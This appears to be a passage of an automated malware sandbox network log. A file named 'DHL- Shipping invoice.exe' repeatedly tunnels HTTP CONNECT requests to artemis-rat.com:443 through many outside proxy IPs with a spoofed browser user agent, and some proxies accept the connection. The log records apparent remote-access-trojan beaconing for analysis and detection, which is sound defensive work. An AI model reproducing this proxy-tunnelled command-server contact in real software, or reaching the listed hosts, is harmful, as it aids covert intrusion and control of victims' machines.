                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2077192.168.2.455616162.253.68.9741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.832869053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2078192.168.2.455048212.42.99.2241456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.877578020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2079192.168.2.455200192.177.75.45806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.883928061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.062335014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.597590923 CET95INHTTP/1.0 200 Connection Established
                            Proxy-agent: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2080192.168.2.452817162.241.45.22556106484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.892509937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2081192.168.2.455115159.223.71.71565816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.950872898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.750082970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.765830040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.765793085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.751147985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2082192.168.2.452868114.132.202.12580806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.950990915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.514285088 CET84INHTTP/1.1 200 OK
                            Date: Tue, 12 Mar 2024 07:37:10 GMT
                            Transfer-Encoding: chunked


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2083192.168.2.45546172.195.34.4241456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.953872919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2084192.168.2.455657103.156.232.8931256484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:09.969244957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2085192.168.2.455090159.223.71.71641936484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.331921101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.065978050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.074187994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.062540054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:18.062547922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:22.062719107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:26.062490940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:33.859268904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:49.562268972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2086192.168.2.455658143.64.8.2180806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.331963062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2087192.168.2.452854138.97.37.11581896484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.332045078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.429265976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.332993984 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2088192.168.2.45313498.170.57.24941456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.349545002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2089192.168.2.45295651.75.125.208409986484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.431035995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.562536955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.563024044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2090192.168.2.452954185.18.198.163587146484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.431147099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.562537909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.563241005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:22.562861919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2091192.168.2.45301794.131.14.6610806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.435255051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.562602043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.563241959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:22.562880993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:34.562251091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:46.562360048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:58.562325001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:22.562271118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:10.562557936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2092192.168.2.455637116.199.170.1741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.445816040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2093192.168.2.452951183.88.46.3780806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.454456091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.619920015 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2094192.168.2.453063162.241.70.64636316484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.461147070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2095192.168.2.455399162.241.50.179621926484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.461275101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.546892881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.602654934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:22.750586987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2096192.168.2.453066190.202.48.182806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.464685917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2097192.168.2.455400209.198.43.5256786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.466483116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2098192.168.2.453965199.58.185.941456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.466481924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2099192.168.2.45539037.32.98.160546476484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.475173950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.546803951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.602650881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:22.750283957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2100192.168.2.45314892.205.61.3847266484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.478358984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:13.562599897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.563241959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:22.562894106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:34.562273979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:46.562463045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2101192.168.2.45296636.74.72.18780806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.481348991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2102192.168.2.455352125.228.143.20741456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.528907061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2103192.168.2.45314434.176.153.9831286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:10.541918039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.866095066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.562776089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.859424114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.062565088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:15.360645056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.859486103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:22.750268936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
